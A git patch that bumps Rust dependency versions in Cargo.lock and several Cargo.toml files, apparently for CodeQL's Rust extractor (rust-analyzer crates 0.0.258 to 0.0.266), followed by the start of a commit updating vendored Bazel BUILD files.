dependencies = [ "cov-mark", "either", @@ -1487,7 +1507,6 @@ dependencies = [ "ra_ap_base_db", "ra_ap_cfg", "ra_ap_intern", - "ra_ap_limit", "ra_ap_mbe", "ra_ap_parser", "ra_ap_span", @@ -1495,7 +1514,7 @@ dependencies = [ "ra_ap_syntax", "ra_ap_syntax-bridge", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", "triomphe", @@ -1503,12 +1522,12 @@ dependencies = [ [[package]] name = "ra_ap_hir_ty" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6feea30dff289f33a8ed76172ff4cb299db22d224f88735aa2c7f49ba1e5e77f" +checksum = "72a591a02787bd2e938c25fceb1f831d0929b9c08726e6d831f85c4a9fba04b5" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "chalk-derive", "chalk-ir", "chalk-recursive", @@ -1522,17 +1541,17 @@ dependencies = [ "nohash-hasher", "oorandom", "ra-ap-rustc_abi", + "ra-ap-rustc_hashes", "ra-ap-rustc_index", "ra-ap-rustc_pattern_analysis", "ra_ap_base_db", "ra_ap_hir_def", "ra_ap_hir_expand", "ra_ap_intern", - "ra_ap_limit", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", "scoped-tls", "smallvec", @@ -1543,12 +1562,12 @@ dependencies = [ [[package]] name = "ra_ap_ide_db" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e33bd5a0139b6c74d34ed963494115abe3f9c95cf5936871ab3d9b548ccbbdf" +checksum = "c74386061453edc3ebfd52141c7c3cde109a7427faff9792a303c3c09a762a01" dependencies = [ "arrayvec", - "bitflags 2.7.0", + "bitflags 2.8.0", "cov-mark", "crossbeam-channel", "either", @@ -1560,42 +1579,34 @@ dependencies = [ "nohash-hasher", "ra_ap_base_db", "ra_ap_hir", - "ra_ap_limit", "ra_ap_parser", "ra_ap_profile", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", "rayon", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", "triomphe", ] [[package]] name = "ra_ap_intern" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "faa7ee24ae9bf4d2536ef7fb6de35f30856edbf7b3d6ac02e5a2532118896569" +checksum = "8239ffde688b558a4335f03d14fa42dcebb203f452367830554b18e17ff1c683" dependencies = [ "dashmap", "hashbrown 0.14.5", - "rustc-hash 2.1.0", - "sptr", + "rustc-hash 2.1.1", "triomphe", ] -[[package]] -name = "ra_ap_limit" -version = "0.0.258" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90d8a2aecbd488cf79b430bd5abe6650da44ae58b31cd6052c909dbd3f5d5926" - [[package]] name = "ra_ap_load-cargo" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e2372aadd32e85460de595891c8b3562126166bc94fdc24508d6784c9d93357" +checksum = "01dd50ca287042b06ca3cc62b60e6891bacee3886d39381d26f9f966e509b1c7" dependencies = [ "anyhow", "crossbeam-channel", @@ -1615,9 +1626,9 @@ dependencies = [ [[package]] name = "ra_ap_mbe" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bf69ba82adb6e436617ecd09c0ff58006f376060dff437eb9fd383c2983f6d01" +checksum = "c193592a0d1dcd315cf8c60f25d37a15c6b50c2b58bfbc6eac38b123e45c8c21" dependencies = [ "arrayvec", "cov-mark", @@ -1629,38 +1640,37 @@ dependencies = [ "ra_ap_syntax", "ra_ap_syntax-bridge", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", ] [[package]] name = "ra_ap_parser" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8f499b6c33a588d60ed9722d057954a21ec01913b97a5693ff40ba4828ffa7b9" +checksum = "b380f96951dd56b8231eeb47884fea12c57b8515ac748eedd590b26cd156681c" dependencies = [ "drop_bomb", "ra-ap-rustc_lexer", "ra_ap_edition", - "ra_ap_limit", "tracing", ] [[package]] name = "ra_ap_paths" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b5a16df131fa641a4af4d9488152b7b332a6a30e93bc655fdbe88f555ba28825" +checksum = "0801105582f532bc59a2b5714a30966c4cf9bd3e5b66f4161763c1d974d2c7d5" dependencies = [ "camino", ] [[package]] name = "ra_ap_proc_macro_api" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3480e0d07197ebcc2db5836b0c39625e07b0d77c6471a2a748e5bdf54ce556e3" +checksum = "da377b243e376b82819f875c1c6624125d27b682a740bd4cafc30b4f496d0ffa" dependencies = [ "indexmap 2.7.0", "ra_ap_intern", @@ -1668,7 +1678,7 @@ dependencies = [ "ra_ap_span", "ra_ap_stdx", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "serde", "serde_derive", "serde_json", @@ -1677,21 +1687,21 @@ dependencies = [ [[package]] name = "ra_ap_profile" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "95b707dd9c92139030587d81b3333428f48af8f4728330ed12101ab0bb431d72" +checksum = "4d6d1391bee4f86e56385438a2dcb739cbb96bd0fbf49799a492332d57e6db62" dependencies = [ "cfg-if", "libc", "perf-event", - "windows-sys 0.52.0", + "windows-sys 0.59.0", ] [[package]] name = "ra_ap_project_model" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "551a0de5a16f0538fbaf401a319d81d1a034f7aa014e46ac87c5bd74229a211b" +checksum = "e8b1ac2712d5f6a20197b360890031e64b4ea097b511f50e2cb8ab1a0e24f577" dependencies = [ "anyhow", "cargo_metadata", @@ -1704,7 +1714,7 @@ dependencies = [ "ra_ap_span", "ra_ap_stdx", "ra_ap_toolchain", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "semver", "serde", "serde_derive", @@ -1715,9 +1725,9 @@ dependencies = [ [[package]] name = "ra_ap_salsa" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ec0c82d9e5affbf7d582750b301d279589787a5ac729f95756f5a0b0bf2b4a4" +checksum = "bc3a0a272f50e2ab831452bd3f4e7f8a571ccf01282d76f4a078f661135ed0ce" dependencies = [ "indexmap 2.7.0", "itertools 0.12.1", @@ -1725,7 +1735,7 @@ dependencies = [ "oorandom", "parking_lot", "ra_ap_salsa-macros", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smallvec", "tracing", "triomphe", @@ -1733,9 +1743,9 @@ dependencies = [ [[package]] name = "ra_ap_salsa-macros" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8440192eb549dda1cdefc95eaa1fc42ad13cfbd303add757517d77c81e7dc2e1" +checksum = "d5d59b47a54fd5468ce0dc03b146afd0932ae0f3d05a5c15ca78d29d5e85bc31" dependencies = [ "heck 0.4.1", "proc-macro2", @@ -1745,9 +1755,9 @@ dependencies = [ [[package]] name = "ra_ap_span" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "18690685d10da2577d7821d46c0de5a884bf1755e59635cbb1a795451e2a4acc" +checksum = "f10dbdd611d2546be7c400934007865e85bb37570566c715edb3aac76367a782" dependencies = [ "hashbrown 0.14.5", "la-arena", @@ -1755,15 +1765,15 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_vfs", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "text-size", ] [[package]] name = "ra_ap_stdx" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4016934faae8413b4ad3f1bf063c7ffccdcfdf3f67ff32f4a79a197a3c1cb0da" +checksum = "b7d5c58fcda9b35d61e23f334b2b11221abf53e7f5e4344fc7eb1de18b2cbf68" dependencies = [ "always-assert", "crossbeam-channel", @@ -1771,14 +1781,14 @@ dependencies = [ "jod-thread", "libc", "miow", - "windows-sys 0.52.0", + "windows-sys 0.59.0", ] [[package]] name = "ra_ap_syntax" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e8e381d21d166d12b11906171f82382473d60abfead0c4acc6d7d07150f87f73" +checksum = "75334f45a8095223823ef1d2789c085460b7b9368c63a6430d46f6f2b9bd5cb5" dependencies = [ "cov-mark", "either", @@ -1788,7 +1798,7 @@ dependencies = [ "ra_ap_parser", "ra_ap_stdx", "rowan", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "smol_str", "tracing", "triomphe", @@ -1796,9 +1806,9 @@ dependencies = [ [[package]] name = "ra_ap_syntax-bridge" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "65f1960218acd2ed8e486e7bd24f80a7eb89591906c6b0831296b2a75c556b2f" +checksum = "b331a50f90ae587d230b1b55b3852ebf67ab740dec33c1a4b0900005037e77c2" dependencies = [ "ra_ap_intern", "ra_ap_parser", @@ -1806,15 +1816,15 @@ dependencies = [ "ra_ap_stdx", "ra_ap_syntax", "ra_ap_tt", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_toolchain" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c9195f69ff02f076f5a726c7fbafa2b4639d00235906cb44e52ca75cd8b33c30" +checksum = "8d56e1b3a34eac0448e54afccf63a6b7699ef14a734b2f1b340246ccdd00c0d3" dependencies = [ "camino", "home", @@ -1822,9 +1832,9 @@ dependencies = [ [[package]] name = "ra_ap_tt" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8ac261d79d3ec475a1f3b2a758d3e466f2b9d7d883fb72239b06979bf6880018" +checksum = "4b974b1211e0b1e17e44b1f256ca1b4a3734d4d98f43ba09ee0a8476fc3a5b83" dependencies = [ "arrayvec", "ra-ap-rustc_lexer", @@ -1835,9 +1845,9 @@ dependencies = [ [[package]] name = "ra_ap_vfs" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ee35a171beccbb01b4ede1d9ad91dee487a3742d7cc39efd7aed6961027cbe78" +checksum = "2b004e20f901dae213cb1673111a2b56fec4f0d1c4c894b62668a0f69ce25065" dependencies = [ "crossbeam-channel", "fst", @@ -1845,15 +1855,15 @@ dependencies = [ "nohash-hasher", "ra_ap_paths", "ra_ap_stdx", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", ] [[package]] name = "ra_ap_vfs-notify" -version = "0.0.258" +version = "0.0.266" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b234b7651eb5d61f18d4f4643590bb8b1fd59ef766a1059741c09c540ec8cd86" +checksum = "95f9e8df03407d76e044f99ef45fafd686d775508aa7d1ba836e9eca58b833a3" dependencies = [ "crossbeam-channel", "notify", @@ -1861,27 +1871,27 @@ dependencies = [ "ra_ap_stdx", "ra_ap_vfs", "rayon", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "tracing", "walkdir", ] [[package]] name = "rand" -version = "0.8.5" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" +checksum = "3779b94aeb87e8bd4e834cee3650289ee9e0d5677f976ecdb6d219e5f4f6cd94" dependencies = [ - "libc", "rand_chacha", "rand_core", + "zerocopy 0.8.20", ] [[package]] name = "rand_chacha" -version = "0.3.1" +version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" +checksum = "d3022b5f1df60f26e1ffddd6c66e8aa15de382ae63b3a0c1bfc0e4d3e3f325cb" dependencies = [ "ppv-lite86", "rand_core", @@ -1889,11 +1899,12 @@ dependencies = [ [[package]] name = "rand_core" -version = "0.6.4" +version = "0.9.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" +checksum = "7a509b1a2ffbe92afab0e55c8fd99dea1c280e8171bd2d88682bb20bc41cbc2c" dependencies = [ "getrandom", + "zerocopy 0.8.20", ] [[package]] @@ -1922,7 +1933,7 @@ version = "0.5.8" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "03a862b389f93e68874fbf580b9de08dd02facb9a788ebadaf4a3fd33cf58834" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", ] [[package]] @@ -1998,9 +2009,15 @@ checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" [[package]] name = "rustc-hash" -version = "2.1.0" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c7fb8039b3032c191086b10f11f319a6e99e1e82889c5cc6046f515c9db1d497" +checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" + +[[package]] +name = "rustc-stable-hash" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2febf9acc5ee5e99d1ad0afcdbccc02d87aa3f857a1f01f825b80eacf8edfcd1" [[package]] name = "rustc_apfloat" @@ -2013,9 +2030,9 @@ dependencies = [ [[package]] name = "ryu" -version = "1.0.18" +version = "1.0.19" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f3cb5ba0dc43242ce17de99c180e96db90b235b8a9fdc9543c96d2209116bd9f" +checksum = "6ea1a2d0a644769cc99faa24c3ad26b379b786fe7c36fd3c546254801650e6dd" [[package]] name = "same-file" @@ -2049,18 +2066,18 @@ dependencies = [ [[package]] name = "serde" -version = "1.0.217" +version = "1.0.218" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "02fc4265df13d6fa1d00ecff087228cc0a2b5f3c0e87e258d8b94a156e984c70" +checksum = "e8dfc9d19bdbf6d17e22319da49161d5d0108e4188e8b680aef6299eed22df60" dependencies = [ "serde_derive", ] [[package]] name = "serde_derive" -version = "1.0.217" +version = "1.0.218" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5a9bf7cf98d04a2b28aead066b7496853d4779c9cc183c440dbac457641e19a0" +checksum = "f09503e191f4e797cb8aac08e9a4a4695c5edf6a2e70e376d961ddd5c969f82b" dependencies = [ "proc-macro2", "quote", @@ -2069,9 +2086,9 @@ dependencies = [ [[package]] name = "serde_json" -version = "1.0.135" +version = "1.0.139" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b0d7ba2887406110130a978386c4e1befb98c674b4fba677954e4db976630d9" +checksum = "44f86c3acccc9c65b153fe1b85a3be07fe5515274ec9f0653b4a0875731c72a6" dependencies = [ "itoa", "memchr", @@ -2148,9 +2165,9 @@ checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" [[package]] name = "smallvec" -version = "1.13.2" +version = "1.14.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c5e1a9a646d36c3599cd173a41282daf47c44583ad367b8e6837255952e5c67" +checksum = "7fcf8323ef1faaee30a44a340193b1ac6814fd9b7b4e88e9d4519a3e4abe1cfd" [[package]] name = "smol_str" @@ -2162,12 +2179,6 @@ dependencies = [ "serde", ] -[[package]] -name = "sptr" -version = "0.3.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3b9b39299b249ad65f3b7e96443bad61c02ca5cd3589f46cb6d610a0fd6c0d6a" - [[package]] name = "stable_deref_trait" version = "1.2.0" @@ -2188,9 +2199,9 @@ checksum = "7da8b5736845d9f2fcb837ea5d9e2628564b3b043a70948a3f0b778838c5fb4f" [[package]] name = "syn" -version = "2.0.96" +version = "2.0.98" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5d0adab1ae378d7f53bdebc67a39f1f151407ef230f0ce2883572f5d8985c80" +checksum = "36147f1a48ae0ec2b5b3bc5b537d267457555a10dc06f3dbc8cb11ba3006d3b1" dependencies = [ "proc-macro2", "quote", @@ -2277,9 +2288,9 @@ dependencies = [ [[package]] name = "toml" -version = "0.8.19" +version = "0.8.20" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1ed1f98e3fdc28d6d910e6737ae6ab1a93bf1985935a1193e68f93eeb68d24e" +checksum = "cd87a5cdd6ffab733b2f74bc4fd7ee5fff6634124999ac278c35fc78c6120148" dependencies = [ "serde", "serde_spanned", @@ -2298,9 +2309,9 @@ dependencies = [ [[package]] name = "toml_edit" -version = "0.22.22" +version = "0.22.24" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ae48d6208a266e853d946088ed816055e556cc6028c5e8e2b84d9fa5dd7c7f5" +checksum = "17b4795ff5edd201c7cd6dca065ae59972ce77d1b80fa0a84d94950ece7d1474" dependencies = [ "indexmap 2.7.0", "serde", @@ -2358,7 +2369,7 @@ version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ee855f1f400bd0e5c02d150ae5de3840039a3f54b025156404e34c23c03f47c3" dependencies = [ - "log 0.4.22", + "log 0.4.25", "once_cell", "tracing-core", ] @@ -2473,9 +2484,9 @@ checksum = "a3e5df347f0bf3ec1d670aad6ca5c6a1859cd9ea61d2113125794654ccced68f" [[package]] name = "unicode-ident" -version = "1.0.14" +version = "1.0.16" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83" +checksum = "a210d160f08b701c8721ba1c726c11662f877ea6b7094007e1ca9a1041945034" [[package]] name = "unicode-properties" @@ -2529,6 +2540,15 @@ version = "0.11.0+wasi-snapshot-preview1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "9c8d87e72b64a3b4db28d11ce29237c246188f4f51057d65a7eab63b7987e423" +[[package]] +name = "wasi" +version = "0.13.3+wasi-0.2.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "26816d2e1a4a36a2940b96c5296ce403917633dff8f3440e9b236ed6f6bacad2" +dependencies = [ + "wit-bindgen-rt", +] + [[package]] name = "wasm-bindgen" version = "0.2.99" @@ -2547,7 +2567,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5f89bb38646b4f81674e8f5c3fb81b562be1fd936d84320f3264486418519c79" dependencies = [ "bumpalo", - "log 0.4.22", + "log 0.4.25", "proc-macro2", "quote", "syn", @@ -2773,13 +2793,22 @@ checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec" [[package]] name = "winnow" -version = "0.6.24" +version = "0.7.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c8d71a593cc5c42ad7876e2c1fda56f314f3754c084128833e64f1345ff8a03a" +checksum = "0e7f4ea97f6f78012141bcdb6a216b2609f0979ada50b20ca5b52dde2eac2bb1" dependencies = [ "memchr", ] +[[package]] +name = "wit-bindgen-rt" +version = "0.33.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3268f3d866458b787f390cf61f4bbb563b922d091359f9608842999eaee3943c" +dependencies = [ + "bitflags 2.8.0", +] + [[package]] name = "yansi" version = "1.0.1" @@ -2793,7 +2822,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1b9b4fd18abc82b8136838da5d50bae7bdea537c574d8dc1a34ed098d6c166f0" dependencies = [ "byteorder", - "zerocopy-derive", + "zerocopy-derive 0.7.35", +] + +[[package]] +name = "zerocopy" +version = "0.8.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dde3bb8c68a8f3f1ed4ac9221aad6b10cece3e60a8e2ea54a6a2dec806d0084c" +dependencies = [ + "zerocopy-derive 0.8.20", ] [[package]] @@ -2806,3 +2844,14 @@ dependencies = [ "quote", "syn", ] + +[[package]] +name = "zerocopy-derive" +version = "0.8.20" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "eea57037071898bf96a6da35fd626f4f27e9cee3ead2a6c703cf09d472b2e700" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] diff --git a/rust/ast-generator/Cargo.toml b/rust/ast-generator/Cargo.toml index d239ed3de089..6e89b5d140cc 100644 --- a/rust/ast-generator/Cargo.toml +++ b/rust/ast-generator/Cargo.toml @@ -9,9 +9,9 @@ license = "MIT" ungrammar = "1.16.1" proc-macro2 = "1.0.93" quote = "1.0.38" -either = "1.13.0" -stdx = {package = "ra_ap_stdx", version = "0.0.258"} +either = "1.14.0" +stdx = {package = "ra_ap_stdx", version = "0.0.266"} itertools = "0.14.0" mustache = "0.9.0" -serde = { version = "1.0.217", features = ["derive"] } -anyhow = "1.0.95" +serde = { version = "1.0.218", features = ["derive"] } +anyhow = "1.0.96" diff --git a/rust/extractor/Cargo.toml b/rust/extractor/Cargo.toml index 3edcbc744db7..cc7c67407964 100644 --- a/rust/extractor/Cargo.toml +++ b/rust/extractor/Cargo.toml @@ -6,25 +6,25 @@ license = "MIT" # When updating these dependencies, run `rust/update_cargo_deps.sh` [dependencies] -anyhow = "1.0.95" -clap = { version = "4.5.26", features = ["derive"] } +anyhow = "1.0.96" +clap = { version = "4.5.31", features = ["derive"] } figment = { version = "0.10.19", features = ["env", "yaml"] } num-traits = "0.2.19" -ra_ap_base_db = "0.0.258" -ra_ap_hir = "0.0.258" -ra_ap_hir_def = "0.0.258" -ra_ap_ide_db = "0.0.258" -ra_ap_hir_expand = "0.0.258" -ra_ap_load-cargo = "0.0.258" -ra_ap_paths = "0.0.258" -ra_ap_project_model = "0.0.258" -ra_ap_syntax = "0.0.258" -ra_ap_vfs = "0.0.258" -ra_ap_parser = "0.0.258" -ra_ap_span = "0.0.258" -ra_ap_cfg = "0.0.258" -ra_ap_intern = "0.0.258" -serde = "1.0.217" +ra_ap_base_db = "0.0.266" +ra_ap_hir = "0.0.266" +ra_ap_hir_def = "0.0.266" +ra_ap_ide_db = "0.0.266" +ra_ap_hir_expand = "0.0.266" +ra_ap_load-cargo = "0.0.266" +ra_ap_paths = "0.0.266" +ra_ap_project_model = "0.0.266" +ra_ap_syntax = "0.0.266" +ra_ap_vfs = "0.0.266" +ra_ap_parser = "0.0.266" +ra_ap_span = "0.0.266" +ra_ap_cfg = "0.0.266" +ra_ap_intern = "0.0.266" +serde = "1.0.218" serde_with = "3.12.0" triomphe = "0.1.14" argfile = "0.2.1" @@ -33,9 +33,9 @@ rust-extractor-macros = { path = "macros" } itertools = "0.14.0" glob = "0.3.2" chrono = { version = "0.4.39", features = ["serde"] } -serde_json = "1.0.135" +serde_json = "1.0.139" dunce = "1.0.5" -toml = "0.8.19" +toml = "0.8.20" tracing = "0.1.41" tracing-flame = "0.2.0" tracing-subscriber = "0.3.19" diff --git a/rust/extractor/macros/Cargo.toml b/rust/extractor/macros/Cargo.toml index 1f1c44b7d15d..06c1a6c43088 100644 --- a/rust/extractor/macros/Cargo.toml +++ b/rust/extractor/macros/Cargo.toml @@ -10,4 +10,4 @@ proc-macro = true # When updating these dependencies, run `rust/update_cargo_deps.sh` [dependencies] quote = "1.0.38" -syn = { version = "2.0.96", features = ["full"] } +syn = { version = "2.0.98", features = ["full"] } diff --git a/shared/tree-sitter-extractor/Cargo.toml b/shared/tree-sitter-extractor/Cargo.toml index a24523e7afbc..4c5bcd199419 100644 --- a/shared/tree-sitter-extractor/Cargo.toml +++ b/shared/tree-sitter-extractor/Cargo.toml @@ -6,7 +6,7 @@ authors = ["GitHub"] # When updating these dependencies, run `misc/bazel/3rdparty/update_cargo_deps.sh` [dependencies] -flate2 = "1.0" +flate2 = "1.1" globset = "0.4" tree-sitter = ">= 0.23.0" tracing = "0.1" @@ -23,4 +23,4 @@ num_cpus = "1.16.0" [dev-dependencies] tree-sitter-ql = "0.23.1" tree-sitter-json = "0.24.8" -rand = "0.8.5" +rand = "0.9.0" From 17703ec908eff8bbe50092d40dbd28c32307ffe4 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Tue, 25 Feb 2025 13:26:39 +0100 Subject: [PATCH 031/892] Bazel: update vendored rust dependencies --- MODULE.bazel | 102 +- misc/bazel/3rdparty/BUILD.bazel | 2 +- .../BUILD.aho-corasick-1.1.3.bazel | 2 +- .../BUILD.always-assert-0.2.0.bazel | 2 +- ...UILD.android_system_properties-0.1.5.bazel | 2 +- .../BUILD.anstream-0.6.18.bazel | 18 +- .../BUILD.anstyle-parse-0.2.6.bazel | 2 +- .../BUILD.anstyle-query-1.1.2.bazel | 6 +- ...bazel => BUILD.anstyle-wincon-3.0.7.bazel} | 13 +- ...1.0.95.bazel => BUILD.anyhow-1.0.96.bazel} | 6 +- .../BUILD.argfile-0.2.1.bazel | 4 +- .../BUILD.atomic-0.6.0.bazel | 2 +- .../tree_sitter_extractors_deps/BUILD.bazel | 256 +-- ...2.7.0.bazel => BUILD.bitflags-2.8.0.bazel} | 2 +- .../BUILD.borsh-1.5.3.bazel | 4 +- .../BUILD.bstr-1.11.3.bazel | 2 +- .../BUILD.camino-1.1.9.bazel | 4 +- .../BUILD.cargo-platform-0.1.9.bazel | 2 +- .../BUILD.cargo_metadata-0.18.1.bazel | 12 +- .../BUILD.cc-1.2.7.bazel | 2 +- ....bazel => BUILD.chalk-derive-0.99.0.bazel} | 10 +- ...98.0.bazel => BUILD.chalk-ir-0.99.0.bazel} | 6 +- ...zel => BUILD.chalk-recursive-0.99.0.bazel} | 12 +- ...0.bazel => BUILD.chalk-solve-0.99.0.bazel} | 18 +- .../BUILD.chrono-0.4.39.bazel | 70 +- ...p-4.5.26.bazel => BUILD.clap-4.5.31.bazel} | 6 +- ....bazel => BUILD.clap_builder-4.5.31.bazel} | 10 +- ...4.bazel => BUILD.clap_derive-4.5.28.bazel} | 10 +- .../BUILD.crc32fast-1.4.2.bazel | 2 +- .../BUILD.crossbeam-channel-0.5.14.bazel | 2 +- .../BUILD.crossbeam-deque-0.8.6.bazel | 4 +- .../BUILD.crossbeam-epoch-0.9.18.bazel | 2 +- .../BUILD.crossbeam-utils-0.8.21.bazel | 2 +- .../BUILD.darling-0.20.10.bazel | 4 +- .../BUILD.darling_core-0.20.10.bazel | 12 +- .../BUILD.darling_macro-0.20.10.bazel | 6 +- .../BUILD.dashmap-5.5.3.bazel | 10 +- ...1.13.0.bazel => BUILD.either-1.14.0.bazel} | 4 +- .../BUILD.ena-0.14.3.bazel | 2 +- .../BUILD.encoding-0.2.33.bazel | 10 +- ...encoding-index-japanese-1.20141219.5.bazel | 2 +- ...D.encoding-index-korean-1.20141219.5.bazel | 2 +- ...oding-index-simpchinese-1.20141219.5.bazel | 2 +- ...coding-index-singlebyte-1.20141219.5.bazel | 2 +- ...oding-index-tradchinese-1.20141219.5.bazel | 2 +- .../BUILD.figment-0.10.19.bazel | 40 +- .../BUILD.filetime-0.2.25.bazel | 56 +- ...-1.0.35.bazel => BUILD.flate2-1.1.0.bazel} | 6 +- .../BUILD.fs-err-2.11.0.bazel | 4 +- .../BUILD.fsevent-sys-4.1.0.bazel | 2 +- .../BUILD.fst-0.4.7.bazel | 2 +- .../BUILD.getrandom-0.2.15.bazel | 166 -- .../BUILD.getrandom-0.3.1.bazel | 226 +++ .../BUILD.globset-0.4.15.bazel | 10 +- .../BUILD.home-0.5.11.bazel | 6 +- .../BUILD.iana-time-zone-0.1.61.bazel | 30 +- .../BUILD.iana-time-zone-haiku-0.1.2.bazel | 4 +- .../BUILD.indexmap-1.9.3.bazel | 6 +- .../BUILD.indexmap-2.7.0.bazel | 4 +- ...0.9.6.bazel => BUILD.inotify-0.11.0.bazel} | 8 +- .../BUILD.inotify-sys-0.1.5.bazel | 2 +- .../BUILD.itertools-0.12.1.bazel | 2 +- .../BUILD.itertools-0.14.0.bazel | 2 +- .../BUILD.js-sys-0.3.76.bazel | 4 +- .../BUILD.kqueue-1.0.8.bazel | 4 +- .../BUILD.kqueue-sys-1.0.4.bazel | 4 +- .../BUILD.libc-0.2.169.bazel | 2 +- .../BUILD.libredox-0.1.3.bazel | 6 +- .../BUILD.line-index-0.1.2.bazel | 4 +- .../BUILD.lock_api-0.4.12.bazel | 6 +- .../BUILD.log-0.3.9.bazel | 2 +- ...og-0.4.22.bazel => BUILD.log-0.4.25.bazel} | 2 +- .../BUILD.matchers-0.1.0.bazel | 2 +- .../BUILD.memoffset-0.9.1.bazel | 4 +- ....2.bazel => BUILD.miniz_oxide-0.8.5.bazel} | 4 +- ...mio-0.8.11.bazel => BUILD.mio-1.0.3.bazel} | 64 +- .../BUILD.miow-0.6.0.bazel | 2 +- .../BUILD.mustache-0.9.0.bazel | 4 +- .../BUILD.notify-6.1.1.bazel | 179 --- .../BUILD.notify-8.0.0.bazel | 190 +++ ...8.bazel => BUILD.notify-types-2.0.0.bazel} | 6 +- .../BUILD.nu-ansi-term-0.46.0.bazel | 8 +- .../BUILD.num-traits-0.2.19.bazel | 4 +- .../BUILD.num_cpus-1.16.0.bazel | 66 +- ...0.2.bazel => BUILD.once_cell-1.20.3.bazel} | 2 +- .../BUILD.os_str_bytes-7.0.0.bazel | 2 +- .../BUILD.parking_lot-0.12.3.bazel | 4 +- .../BUILD.parking_lot_core-0.9.10.bazel | 60 +- .../BUILD.pear-0.2.9.bazel | 6 +- 